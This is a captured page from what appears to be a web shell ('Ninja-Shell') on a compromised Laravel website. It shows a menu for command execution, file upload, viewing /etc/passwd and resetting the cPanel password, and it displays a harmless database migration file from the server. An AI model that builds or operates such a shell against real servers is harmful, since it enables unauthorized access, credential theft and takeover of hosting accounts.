{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: ///var/www/bfti-website/database//migrations/2024_07_17_074602_add_order_column_to_table.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. */ public function up(): void { Schema::table('our_teams', function (Blueprint $table) { $table->integer('order')->default(0); }); } /** * Reverse the migrations. */ public function down(): void { Schema::table('our_teams', function (Blueprint $table) { $table->dropColumn('order'); }); } };
./Ninja\.